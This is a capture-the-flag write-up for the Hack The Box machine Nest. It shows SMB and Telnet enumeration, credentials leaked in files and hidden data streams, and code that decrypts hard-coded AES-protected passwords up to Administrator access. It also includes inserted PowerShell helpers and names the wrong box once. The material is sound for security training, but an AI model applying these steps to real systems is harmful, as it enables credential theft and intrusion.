7th August 2020
Hack The Box Write Up Nest by T13nn3s

Hack The Box Write-Up Nest – 10.10.10.178

Look up at the stars and not down at your feet

Stephen Hawking

About Nest

In this post, I’m writing a write-up for the machine Forest from Hack The Box. Hack The Box is an online platform allowing you to test and advance your skills in cybersecurity.

This box shows the concepts of enumeration. It relies heavily on enumeration and basic knowledge of the VB.NET scripting language. It is a CTF-like box and one big puzzle that you have to put back together after each step to be able to go on to the next one. I really enjoyed this box, even though I was misled a few times by files I found and misinterpreted. This box is one of the nicest boxes I have done at Hack The Box; I really enjoyed it.

Foothold
The Nmap port scan reveals two open ports: 445/tcp for SMB and 4386/tcp. The last port belongs to an unknown service; I found that the HQK Reporting Service V1.2 is running on this port. It is reachable through Telnet. I found some files but was not able to open them. The DEBUG command needs a password, which I do not have (yet). Through the enumeration of SMB as Guest, I found the credentials for TempUser in an alternative data stream of a TXT file. I have now gained a foothold on this machine.

User
The user TempUser has more permissions to access files, and with this user I found a Visual Basic project which needs to be compiled. After compiling, the code reveals that it holds an encrypted string. After doing some modification to this file for decryption of the string, I found the password for the user account c.smith.

Root
The user c.smith holds interesting information on his home drive for the HQK Reporting Service V1.2. With PowerShell, I revealed an alternative data stream in the file ‘Debug Mode Password.txt’. This stream contains the DEBUG password for the HQK service. Through the DEBUG console, I discovered the HqkLdap.exe file. After decompiling this program with dotPeek, I found that this program holds an encrypted password. After adding a one-liner to this code that calls the decryption function, I got the Administrator password. With this password, I was able to get the root flag by making an SMB connection with the Administrator account.

Machine Info

(Image: machine IP and creator)

Recon

Portscan

As always, first the port scan with Nmap. I added the -p- parameter to the scan; otherwise the high port would not be detected.

~$ nmap -p- -sC -sV -oA ./nmap/nest.txt 10.10.10.178

The results of the portscan.

Nmap scan report for 10.10.10.178
Host is up (0.15s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
|     Reporting Service V1.2
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     Reporting Service V1.2
|     Unrecognised command
|   Help:
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :


Host script results:
|_clock-skew: -58m52s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-01-27T20:29:00
|_  start_date: 2020-01-27T19:50:09 

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 789.14 seconds

The port scan shows that there are two open ports:

  • 445/tcp (SMB)
  • 4386/tcp (unknown)

Enumeration with Telnet

Port 4386 is not bound to a well-known service by default. Nmap still returns some useful information: it shows that I can run some commands.

...
|   Help:
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>
...

I started by opening http://10.10.10.178:4386 in the web browser. The page keeps loading for a little while, but I’m patient, and the server returns the following:

(Screenshot: http://10.10.10.178:4386 opened in the browser)

The service is expecting a command. I first tried to create a session to the server with netcat. A prompt comes up, but I cannot use any of the commands. Then I tried with Telnet.

~$ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>

Now I’m getting somewhere. The LIST command shows that I’m currently in the hqk directory. With the SETDIR command I can change the directory, and with SETDIR ../ I can go a level up. I’ve searched through all of the directories and found some useful files, but I can’t open any of them. The HELP command shows that I can use a DEBUG command, but this command needs a password.

>help debug

DEBUG <Password>
Enables debug mode, which allows the use of additional commands to use for troubleshooting network and configuration issues. Requires a password which will be set by your system administrator when the service was installed

Examples: 
DEBUG MyPassw0rd     Attempts to enable debug mode by using the
                     password "MyPassw0rd"

Let’s poke around a bit. After running around on the server I found some interesting directories in C:\Shared but again, none of the files can be opened or downloaded. Let’s try the lower port for further enumeration.

Enumerate SMB

I don’t have any user credentials yet. Sometimes it is possible to gain access as an anonymous user. For this step I use smbmap. I invoked the command below:

~$ smbmap -u Guest -H 10.10.10.178
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.178...
[+] IP: 10.10.10.178:445        Name: 10.10.10.178                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        .                                                  
        dr--r--r--                0 Tue Jan 28 10:38:36 2020    .
        dr--r--r--                0 Tue Jan 28 10:38:36 2020    ..
        dr--r--r--                0 Thu Aug  8 00:58:07 2019    IT
        dr--r--r--                0 Mon Aug  5 23:53:41 2019    Production
        dr--r--r--                0 Mon Aug  5 23:53:50 2019    Reports
        dr--r--r--                0 Wed Aug  7 21:07:51 2019    Shared
        Data                                                    READ ONLY
        IPC$                                                    NO ACCESS       Remote IPC
        Secure$                                                 NO ACCESS
        .                                                  
        dr--r--r--                0 Tue Jan 28 10:38:41 2020    .
        dr--r--r--                0 Tue Jan 28 10:38:41 2020    ..
        dr--r--r--                0 Fri Aug  9 17:08:23 2019    Administrator
        dr--r--r--                0 Sun Jan 26 08:21:44 2020    C.Smith
        dr--r--r--                0 Thu Aug  8 19:03:29 2019    L.Frost
        dr--r--r--                0 Thu Aug  8 19:02:56 2019    R.Thompson
        dr--r--r--                0 Thu Aug  8 00:56:02 2019    TempUser
        Users                                                   READ ONLY

First I tried smbclient //10.10.10.178/Users, entering a random password at the prompt. But I do not have access to open any folder.

~$ smbclient //10.10.10.178/Users
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> ls
  .                                   D        0  Tue Jan 28 10:38:41 2020
  ..                                  D        0  Tue Jan 28 10:38:41 2020
  Administrator                       D        0  Fri Aug  9 17:08:23 2019
  C.Smith                             D        0  Sun Jan 26 08:21:44 2020
  L.Frost                             D        0  Thu Aug  8 19:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 19:02:50 2019
  TempUser                            D        0  Thu Aug  8 00:55:56 2019

\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*

\C.Smith
NT_STATUS_ACCESS_DENIED listing \C.Smith\*

\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*

\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*

\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*
smb: \> 

With the command smbclient //10.10.10.178/Data I got a bite. I have access to the Shared folder. The file ‘Welcome Email.txt’ in location \Shared\Templates\HR contains interesting information. I downloaded this file, with the use of the ‘mget’ command, to my machine and read the contents of this file.

~$ cat 'Welcome Email.txt'
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location: 
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the 
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019


Thank you

Cool! Now I got some credentials! The file says that we can make a network connection to a share.

Intrusion

TempUser

I created an SMB connection with this command:

~$ smbclient //10.10.10.178/Users/ -U TempUser -W HTB-NEST
Enter HTB-NEST\TempUser's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jan 26 00:04:21 2020
  ..                                  D        0  Sun Jan 26 00:04:21 2020
  Administrator                       D        0  Fri Aug  9 17:08:23 2019
  C.Smith                             D        0  Sun Jan 26 08:21:44 2020
  L.Frost                             D        0  Thu Aug  8 19:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 19:02:50 2019
  TempUser                            D        0  Thu Aug  8 00:55:56 2019

                10485247 blocks of size 4096. 6449705 blocks available
smb: \> cd TempUser\
smb: \TempUser\> ls
  .                                   D        0  Thu Aug  8 00:55:56 2019
  ..                                  D        0  Thu Aug  8 00:55:56 2019
  New Text Document.txt               A        0  Thu Aug  8 00:55:56 2019

                10485247 blocks of size 4096. 6449705 blocks available
smb: \TempUser\> 

There is a file ‘New Text Document.txt’. When I open this file… I find that it is empty. All that work for an empty file?! Although, maybe this file isn’t as empty as it seems. I want to get all the information about this file. I’ll do this with the allinfo command.

smb: \TempUser\> allinfo "New Text Document.txt" 
altname: NEWTEX~1.TXT
create_time:    Thu Aug  8 12:55:56 AM 2019 CEST
access_time:    Thu Aug  8 12:55:56 AM 2019 CEST
write_time:     Thu Aug  8 12:55:56 AM 2019 CEST
change_time:    Thu Aug  8 12:56:02 AM 2019 CEST
attributes: A (20)
stream: [::$DATA], 0 bytes

Yep, this file is as empty as it looks. There’s also no alternative data stream in it. I’ve got the user credentials TempUser:welcome2019. I created a connection with this user.

~$ smbclient //10.10.10.178/Data/ --user TempUser -W NEST-HTB

I downloaded all the files from the \IT\Configs directory. The other folders are empty. I investigated the files. In the file RU_config.xml I found an encrypted password for the user c.smith.

<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>

I placed the password in the ‘hash.txt’ file, decoded it as base64 and tried to run john against it. The decoded string looks like a complex password, but this password isn’t working on SMB. Then I looked into the config.xml file, and this part of the file is very interesting:

...
<Find name="192" />
        <Replace name="C_addEvent" />
    </FindHistory>
    <History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
    </History>
...

I have no access to the location //10.10.10.178/Secure$ with smbclient; it leaves me with an access denied error. It took me some hours to find the next step. I found out that I can browse in this location: the cd command isn’t prohibited. I invoked this command:

~$ smbclient //10.10.10.178/Secure$ --user TempUser -W NEST-HTB
Enter NEST-HTB\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> cd IT\
smb: \IT\> ls
NT_STATUS_ACCESS_DENIED listing \IT\*
smb: \IT\> cd Carl
smb: \IT\Carl\> ls
  .                                   D        0  Wed Aug  7 21:42:14 2019
  ..                                  D        0  Wed Aug  7 21:42:14 2019
  Docs                                D        0  Wed Aug  7 21:44:00 2019
  Reports                             D        0  Tue Aug  6 15:45:40 2019
  VB Projects                         D        0  Tue Aug  6 16:41:55 2019

I walked through all the files and directories and downloaded the files to my machine for further investigation.

Compile Visual Basic Project (Visual Studio)

When I put all the files together, it seems that I have downloaded a Visual Basic project with the name RU Scanner. I placed the project file in C:\%path%\VB Projects\WIP\RU\RUScanner.sln. From this moment I switched to my Windows machine. On this machine, I already have Visual Studio 16.4.3 installed. I opened the file RUScanner.sln.

ConfigFile.vb

Let’s start from the beginning. I build this project by right-clicking on ‘RU Scanner’ in the Solution Explorer and then clicking ‘Build’. In C:\%PATH%\VB Projects\WIP\RU\RUScanner\bin\Debug there is now a file with the name DbProf.exe. When I run this file, some errors are visible.

Errors while running DbProf.exe

According to the first error, I placed config.xml in the ‘Debug’ folder and called DbProf.exe. Result: an empty line. OK, the errors are gone, but no decrypted password.

The script needs some modification. When I read this script carefully, there is an encryption and decryption section in the Utils.vb file. When I run DbProf.exe, Module1 is called and executed. This module is placed in the file Module1.vb. As this module contains no code for printing the decrypted password, nothing happens. To get the decryption done, I need to pass the encrypted string to this module and read the decrypted password. So, I ended up with two lines of code to get the decryption to do its thing:

I added these two lines of code:

Console.WriteLine(Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="))
Console.ReadLine()

The file ‘Module1.vb’ after the modification:

Module Module1

    Sub Main()
        Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
        Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}

        ' Added lines: print the decrypted password and wait so the console stays open
        Console.WriteLine(Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="))
        Console.ReadLine()
    End Sub

End Module
Adding two lines of code

Now, I can call this file again from the command line:

(Screenshot: running DbProf.exe from the command line)

And the password for the user c.smith is now decrypted. The password is xRxRxPANCAK3SxRxRx.

Switch to user c.smith

With the password of the user c.smith I can create an SMB session. I invoked this command:

~$ smbclient //10.10.10.178/Users --user c.smith -W NEST-HTB

I go to user.txt and download this file to my machine.

smb: \> cd C.smith
smb: \C.smith\> mget user.txt

By opening this file I can read the user flag.

~$ cat user.txt 
cf71b25404be5d84fd827e05f426e987

Privilege escalation to root

Enumeration SMB

I can now do more enumeration with the user c.smith. There are interesting files on his home drive \C.Smith\HQK Reporting. I downloaded the files to my machine.

smb: \C.Smith\HQK Reporting\AD Integration Module\> ls
  .                                   D        0  Fri Aug  9 14:18:42 2019
  ..                                  D        0  Fri Aug  9 14:18:42 2019
  HqkLdap.exe                         A    17408  Thu Aug  8 01:41:16 2019

                10485247 blocks of size 4096. 6449680 blocks available
smb: \C.Smith\HQK Reporting\AD Integration Module\> mget *
Get file HqkLdap.exe? yes
getting file \C.Smith\HQK Reporting\AD Integration Module\HqkLdap.exe of size 17408 as HqkLdap.exe (67.5 KiloBytes/sec) (average 67.5 KiloBytes/sec)
smb: \C.Smith\HQK Reporting\> ls
  .                                   D        0  Fri Aug  9 01:06:17 2019
  ..                                  D        0  Fri Aug  9 01:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 14:18:42 2019
  Debug Mode Password.txt             A        0  Fri Aug  9 01:08:17 2019
  HQK_Config_Backup.xml               A      249  Fri Aug  9 01:09:05 2019

                10485247 blocks of size 4096. 6449723 blocks available
smb: \C.Smith\HQK Reporting\> mget *
Get file Debug Mode Password.txt? yes
getting file \C.Smith\HQK Reporting\Debug Mode Password.txt of size 0 as Debug Mode Password.txt (0.0 KiloBytes/sec) (average 48.3 KiloBytes/sec)
Get file HQK_Config_Backup.xml? yes
getting file \C.Smith\HQK Reporting\HQK_Config_Backup.xml of size 249 as HQK_Config_Backup.xml (0.5 KiloBytes/sec) (average 21.5 KiloBytes/sec)
smb: \C.Smith\HQK Reporting\>

It seems that the file ‘Debug Mode Password.txt’ is empty. Another empty file… Let’s start with this file; there has to be some content in it, since it was not easy to get this far in the challenge. And for this one, I switched (again?) to my Windows machine. (Sorry guys, I’m a Windows Engineer…).

PowerShell is a powerful tool in Windows. It can also be used to extract hidden data streams. From my Windows machine, I created a network connection to the home folder of c.smith and invoked the commands below to get the contents of this file:

PS Z:\C.Smith> cd '.\HQK Reporting\'
PS Z:\C.Smith\HQK Reporting> ls


    Directory: Z:\C.Smith\HQK Reporting


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         9-8-2019     14:18                AD Integration Module
-a----         9-8-2019     01:08              0 Debug Mode Password.txt
-a----         9-8-2019     01:09            249 HQK_Config_Backup.xml


PS Z:\C.Smith\HQK Reporting> Get-Item '.\Debug Mode Password.txt' -stream *


PSPath        : Microsoft.PowerShell.Core\FileSystem::Z:\C.Smith\HQK Reporting\Debug Mode Password.txt::$DATA
PSParentPath  : Microsoft.PowerShell.Core\FileSystem::Z:\C.Smith\HQK Reporting
PSChildName   : Debug Mode Password.txt::$DATA
PSDrive       : Z
PSProvider    : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
FileName      : Z:\C.Smith\HQK Reporting\Debug Mode Password.txt
Stream        : :$DATA
Length        : 0

PSPath        : Microsoft.PowerShell.Core\FileSystem::Z:\C.Smith\HQK Reporting\Debug Mode Password.txt:Password
PSParentPath  : Microsoft.PowerShell.Core\FileSystem::Z:\C.Smith\HQK Reporting
PSChildName   : Debug Mode Password.txt:Password
PSDrive       : Z
PSProvider    : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
FileName      : Z:\C.Smith\HQK Reporting\Debug Mode Password.txt
Stream        : Password
Length        : 15



PS Z:\C.Smith\HQK Reporting> Get-Content '.\Debug Mode Password.txt' -stream Password
WBQ201953D8w
PS Z:\C.Smith\HQK Reporting>
Extract hidden data from ‘Debug Mode Password.txt’
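The Get-Item -Stream * trick above inspects one file at a time. As an added example (my own code, not from the write-up), the PowerShell function below walks a directory or mapped share and reports every file carrying a stream other than the default ::$DATA, previewing small ones; the demo at the end builds a constructed throwaway file with a Password stream, so nothing depends on the box.

```powershell
# Added example: find files that hide data in alternate data streams (ADS) on NTFS.
# Files with a 0-byte ::$DATA stream but a named stream, like 'Debug Mode Password.txt',
# are exactly what this reports.
function Find-AlternateDataStream {
    param(
        [Parameter(Mandatory)][string]$Path,
        [long]$MaxPreviewBytes = 64   # only preview small streams; big ones may be binaries
    )
    Get-ChildItem -LiteralPath $Path -Recurse -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' } |
                ForEach-Object {
                    $preview = $null
                    if ($_.Length -le $MaxPreviewBytes) {
                        $preview = Get-Content -LiteralPath $file.FullName -Stream $_.Stream -Raw -ErrorAction SilentlyContinue
                    }
                    [pscustomobject]@{
                        File    = $file.FullName
                        Stream  = $_.Stream
                        Length  = $_.Length
                        Preview = $preview
                    }
                }
        }
}

# Self-contained demo on constructed data (not the file from the box): an empty file whose
# only content lives in a named 'Password' stream. Downloaded files will also show up here
# with their Zone.Identifier stream, which is normal.
$demo   = Join-Path $env:TEMP ('ads-demo-' + [guid]::NewGuid())
New-Item -ItemType Directory -Path $demo | Out-Null
$target = Join-Path $demo 'Debug Mode Password.txt'
New-Item -ItemType File -Path $target | Out-Null                       # 0 bytes in ::$DATA
Set-Content -LiteralPath $target -Stream Password -Value 'hidden-value' -NoNewline

Find-AlternateDataStream -Path $demo | Format-Table -AutoSize

Remove-Item -LiteralPath $demo -Recurse -Force
```

Point it at a mapped share such as Z:\C.Smith to repeat the author's check over the whole tree instead of one file.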

I now have the DEBUG password: WBQ201953D8w. I created a telnet session to 10.10.10.178 on port 4386 and entered DEBUG mode by filling in the password.

~$ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>DEBUG WBQ201953D8w

I have now more commands at my disposal:

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>

I need to poke around and try to find something interesting. In the directory LDAP, there is a file named ldap.conf with the contents:

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

Another encrypted password… I have copied the contents of this file to my machine. I need to put all of the pieces together, starting with the file HqkLdap.exe. To know what this file is doing, I need to decompile it.

Decompile HqkLdap.exe (dotPeek)

To decompile this program I use dotPeek from JetBrains. I downloaded this program from their website: https://www.jetbrains.com/decompiler/. I loaded HqkLdap.exe into the software, which decompiled it to C# code. After reading through the code, the class CR is interesting because in this part the password gets decrypted. I got an encrypted password for the Administrator account which needs to be decrypted, so that sounds logical.

Decompilation of HqkLdap.exe in JetBrains dotPeek

The method public static string DS(string EncryptedString) takes the encrypted string and decrypts it.

In Visual Studio, I created a new C# project with the name ‘decrypt_admin.cs’ and copied the contents of the CR class into this project. I ended up editing this file and adding some lines which call the DS function with the encrypted password as a string.

// HqkLdap.CR
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

public class CR
{
	private const string K = "667912";

	private const string I = "1L1SA61493DRV53Z";

	private const string SA = "1313Rf99";

	public static string DS(string EncryptedString)
	{
		if (string.IsNullOrEmpty(EncryptedString))
		{
			return string.Empty;
		}
		return RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
	}

	public static string ES(string PlainString)
	{
		if (string.IsNullOrEmpty(PlainString))
		{
			return string.Empty;
		}
		return RE(PlainString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
	}

	private static string RE(string plainText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize)
	{
		//Discarded unreachable code: IL_00b9
		byte[] bytes = Encoding.ASCII.GetBytes(initVector);
		byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
		byte[] bytes3 = Encoding.ASCII.GetBytes(plainText);
		Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations);
		byte[] bytes4 = rfc2898DeriveBytes.GetBytes(checked((int)Math.Round((double)keySize / 8.0)));
		AesCryptoServiceProvider aesCryptoServiceProvider = new AesCryptoServiceProvider();
		aesCryptoServiceProvider.Mode = CipherMode.CBC;
		ICryptoTransform transform = aesCryptoServiceProvider.CreateEncryptor(bytes4, bytes);
		using (MemoryStream memoryStream = new MemoryStream())
		{
			using (CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Write))
			{
				cryptoStream.Write(bytes3, 0, bytes3.Length);
				cryptoStream.FlushFinalBlock();
				byte[] inArray = memoryStream.ToArray();
				memoryStream.Close();
				cryptoStream.Close();
				return Convert.ToBase64String(inArray);
			}
		}
	}

	private static string RD(string cipherText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize)
	{
		byte[] bytes = Encoding.ASCII.GetBytes(initVector);
		byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
		byte[] array = Convert.FromBase64String(cipherText);
		Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations);
		checked
		{
			byte[] bytes3 = rfc2898DeriveBytes.GetBytes((int)Math.Round((double)keySize / 8.0));
			AesCryptoServiceProvider aesCryptoServiceProvider = new AesCryptoServiceProvider();
			aesCryptoServiceProvider.Mode = CipherMode.CBC;
			ICryptoTransform transform = aesCryptoServiceProvider.CreateDecryptor(bytes3, bytes);
			MemoryStream memoryStream = new MemoryStream(array);
			CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Read);
			byte[] array2 = new byte[array.Length + 1];
			int count = cryptoStream.Read(array2, 0, array2.Length);
			memoryStream.Close();
			cryptoStream.Close();
			return Encoding.ASCII.GetString(array2, 0, count);
		}
	}

	// Added entry point: decrypt the Administrator password from ldap.conf
	public static void Main(string[] args)
	{
		Console.WriteLine(DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="));
	}
}

Decrypt the Administrator password

The last thing that I have to do now is to run the code and get the password decrypted. I decrypted the password with Fiddle.NET ( https://dotnetfiddle.net/ ).
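Compiling a C# project or pasting into an online fiddle is not the only way to run CR.DS(). As an added example (my own code, not from the write-up or from HqkLdap.exe), the PowerShell below re-implements the decompiled RD()/RE() routines with the same .NET classes and the constants visible in the CR class, parses the ldap.conf key=value format shown above, and round-trips a probe string first so a wrong constant is caught before the real value is trusted; the ldap.conf lines are a constructed copy of the file contents on the page.

```powershell
# Added example: CR.DS() / CR.ES() from the decompiled HqkLdap.exe, rebuilt in PowerShell
# with the same primitives (Rfc2898DeriveBytes = PBKDF2-HMAC-SHA1, AES-256-CBC, PKCS7).
function Get-HqkKeyMaterial {
    param(
        [string]$PassPhrase = '667912',             # CR.K
        [string]$Salt       = '1313Rf99',           # CR.SA
        [int]   $Iterations = 3,                    # hard-coded in DS()/ES()
        [string]$InitVector = '1L1SA61493DRV53Z',   # CR.I, 16 ASCII bytes = one AES block
        [int]   $KeySize    = 256
    )
    $saltBytes = [System.Text.Encoding]::ASCII.GetBytes($Salt)
    $kdf = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($PassPhrase, $saltBytes, $Iterations)
    [pscustomobject]@{
        Key = $kdf.GetBytes([int][math]::Round($KeySize / 8))   # 32 bytes, as RD() computes it
        IV  = [System.Text.Encoding]::ASCII.GetBytes($InitVector)
    }
}

function Unprotect-HqkString {
    param([Parameter(Mandatory)][string]$CipherText)   # base64 as stored in ldap.conf
    if ([string]::IsNullOrEmpty($CipherText)) { return '' }
    $km   = Get-HqkKeyMaterial
    $data = [System.Convert]::FromBase64String($CipherText)
    $aes  = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7   # AesCryptoServiceProvider default
        $dec = $aes.CreateDecryptor($km.Key, $km.IV)
        # TransformFinalBlock decrypts the whole buffer and strips the padding, instead of the
        # single Read() into a Length+1 buffer that the decompiled RD() relies on
        $plain = $dec.TransformFinalBlock($data, 0, $data.Length)
        return [System.Text.Encoding]::ASCII.GetString($plain)
    } finally { $aes.Dispose() }
}

function Protect-HqkString {
    param([Parameter(Mandatory)][string]$PlainText)
    $km   = Get-HqkKeyMaterial
    $data = [System.Text.Encoding]::ASCII.GetBytes($PlainText)
    $aes  = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $enc = $aes.CreateEncryptor($km.Key, $km.IV)
        return [System.Convert]::ToBase64String($enc.TransformFinalBlock($data, 0, $data.Length))
    } finally { $aes.Dispose() }
}

function Read-HqkLdapConf {
    param([Parameter(Mandatory)][string[]]$Lines)
    $conf = @{}
    foreach ($line in $Lines) {
        # split on the first '=' only: the BaseOu value itself contains '=' characters
        if ($line -match '^\s*([^=#]+?)\s*=\s*(.*)$') { $conf[$Matches[1]] = $Matches[2] }
    }
    return $conf
}

# Round-trip check before trusting the result on real data
$probe = 'round-trip-probe'
if ((Unprotect-HqkString (Protect-HqkString $probe)) -ne $probe) {
    throw 'CR re-implementation does not round-trip; check the constants'
}

# Constructed copy of the ldap.conf contents found through the DEBUG console
$ldapConf = @(
    'Domain=nest.local',
    'Port=389',
    'BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local',
    'User=Administrator',
    'Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4='
)
$conf = Read-HqkLdapConf -Lines $ldapConf
'{0}: {1}' -f $conf['User'], (Unprotect-HqkString -CipherText $conf['Password'])
```

The same functions decrypt any value protected with this scheme, so a defender can use them to audit how many credentials in HQK configs and backups share these hard-coded key parameters.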

Root the box

I have now reached the last part of this box. I created an SMB session with the Administrator account and browsed to the desktop of the Administrator account, where root.txt is located.

~# smbclient //10.10.10.178/C$ --user Administrator -W NEST-HTB
Enter NEST-HTB\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> cd Users\Administrator\Desktop
smb: \Users\Administrator\Desktop\> mget root.txt

Submit this flag and this box is owned! Did you like this write-up? Please consider giving a respect point on my HTB profile: https://www.hackthebox.eu/home/users/profile/224856. It means a lot to me, many thanks!

Happy hacking!

T13nn3s

I'm a cyber security enthusiast! I love my work, I love writing scripts and doing research and pen testing. Big fan of Hack The Box and I learn new things every day to make the internet safer. I blog because I love to summarize my thoughts and share them with you.
